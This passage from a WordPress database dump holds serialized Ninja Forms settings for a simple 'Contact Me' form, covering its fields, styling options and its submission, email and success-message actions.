"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";}}}s:7:\"actions\";a:4:{i:0;a:2:{s:2:\"id\";i:5;s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:1;a:2:{s:2:\"id\";i:6;s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:2;a:2:{s:2:\"id\";i:7;s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";}}i:3;a:2:{s:2:\"id\";i:8;s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:58\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";}}}s:8:\"settings\";a:99:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";}}','yes'),(47254,'nf_form_1','a:4:{s:2:\"id\";i:1;s:6:\"fields\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:70:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";i:1;s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:27\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:62:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";i:1;s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:27\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"2\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:71:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";i:1;s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:27\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"3\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:69:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";i:1;s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:27\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";s:1:\"5\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";}}}s:7:\"actions\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:28\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2017-09-13 07:05:28\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja 